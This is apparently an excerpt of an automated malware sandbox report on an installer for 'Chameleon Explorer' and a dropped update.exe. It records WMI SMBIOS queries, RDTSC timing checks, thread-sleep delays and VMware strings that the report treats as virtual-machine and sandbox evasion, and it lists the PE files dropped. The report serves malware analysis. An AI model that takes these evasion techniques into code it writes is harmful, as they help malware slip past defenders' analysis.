                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Tries to detect virtualization through RDTSC time measurements
                      Source: C:\Users\user\AppData\Roaming\update.exeRDTSC instruction interceptor: First address: 000000000046C47A second address: 000000000046C47A instructions: 0x00000000 rdtsc 0x00000002 test cl, FFFFFFFFh 0x00000005 cmp bh, ch 0x00000007 cmp al, 45h 0x00000009 cmp ecx, 00FFFFFFh 0x0000000f jne 00007FD174E1E800h 0x00000011 test dx, dx 0x00000014 cmp eax, eax 0x00000016 cmp si, D590h 0x0000001b inc ecx 0x0000001c test dh, ch 0x0000001e cmp ecx, eax 0x00000020 test ah, bh 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 6132Thread sleep count: 1455 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 6132Thread sleep count: 320 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 6132Thread sleep count: 100 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 6132Thread sleep count: 623 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 5224Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe TID: 5208Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe TID: 1916Thread sleep time: -45700s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\update.exe TID: 5040Thread sleep count: 74 > 30
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-614
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeWindow / User API: threadDelayed 1455Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeWindow / User API: threadDelayed 623Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeWindow / User API: threadDelayed 457Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeAPI coverage: 7.0 %
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backupJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-HQP5N.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V4HOF.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-FAU52.tmpJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\is-4Q1I9.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)Jump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backupJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeDropped PE file which has not been started: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dllJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.iniJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: ChameleonExplorer.exe, 00000012.00000003.443085403.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGAC
                      Source: ChameleonExplorer.exe, 00000012.00000003.405435943.0000000003C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-a
                      Source: ChameleonExplorer.exe, 00000012.00000003.420530800.0000000004C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware
                      Source: ChameleonExplorer.exe, 00000011.00000003.347114926.000000000153B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d
                      Source: ChameleonExplorer.exe, 00000012.00000003.457749861.0000000004C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.1x9
                      Source: ChameleonExplorer.exe, 00000012.00000002.525657397.0000000004BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW41 S
                      Source: ChameleonExplorer.exe, 00000012.00000003.430767443.0000000004C40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/2
                      Source: ChameleonExplorer.exe, 00000012.00000003.401440990.0000000003C25000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000003.401813254.0000000003C35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
                      Source: ChameleonExplorer.exe, 00000006.00000003.308059485.0000000003B71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000002.526368980.00000000051EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.on
                      Source: ChameleonExplorer.exe, 00000012.00000003.390284345.0000000003C3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 37 a0 VMware77
                      Source: ChameleonExplorer.exe, 00000012.00000003.444400655.0000000004C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7:
                      Source: ChameleonExplorer.exe, 00000012.00000003.478462271.0000000004CC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 3
                      Source: ChameleonExplorer.exe, 00000012.00000003.443897794.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d78
                      Source: ChameleonExplorer.exe, 00000006.00000002.326211855.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                      Source: ChameleonExplorer.exe, 00000012.00000002.517693583.0000000003187000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 23#$hid$F5C6EA6370B66420#$d7.VMware7.....
                      Source: ChameleonExplorer.exe, 00000011.00000003.347114926.000000000153B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d
                      Source: ChameleonExplorer.exe, 00000012.00000003.500721494.0000000004D26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa
                      Source: ChameleonExplorer.exe, 00000012.00000003.505729138.0000000004D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c.NoneVMware-42 35 d8
                      Source: ChameleonExplorer.exe, 00000012.00000003.429315202.0000000004C40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: are-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000002.520165680.0000000003A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW71.00V.18227214.B64.2106252220.06/25/2021..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................H,X
                      Source: ChameleonExplorer.exe, 00000006.00000003.324097015.000000000320F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware7,1m.RangeException\CurVer
                      Source: ChameleonExplorer.exe, 00000012.00000003.481811089.0000000004D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VM
                      Source: ChameleonExplorer.exe, 00000012.00000003.405435943.0000000003C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 37 a0 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.482528298.0000000004C8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7 a0 49 53 d7VMware7,1k?
                      Source: ChameleonExplorer.exe, 00000012.00000003.505729138.0000000004D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: ChameleonExplorer.exe, 00000012.00000003.505729138.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 2
                      Source: ChameleonExplorer.exe, 00000012.00000003.405435943.0000000003C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-a
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                      Source: ChameleonExplorer.exe, 00000012.00000003.420530800.0000000004C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 49 53 d7VMware7,1
                      Source: ChameleonExplorer.exe, 00000012.00000003.505029031.0000000004D1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7V
                      Source: ChameleonExplorer.exe, 00000012.00000003.494634114.0000000004CE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Il[
                      Source: ChameleonExplorer.exe, 00000012.00000003.429823235.0000000004C39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMw
                      Source: ChameleonExplorer.exe, 00000012.00000002.517693583.0000000003187000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d7.VMware7
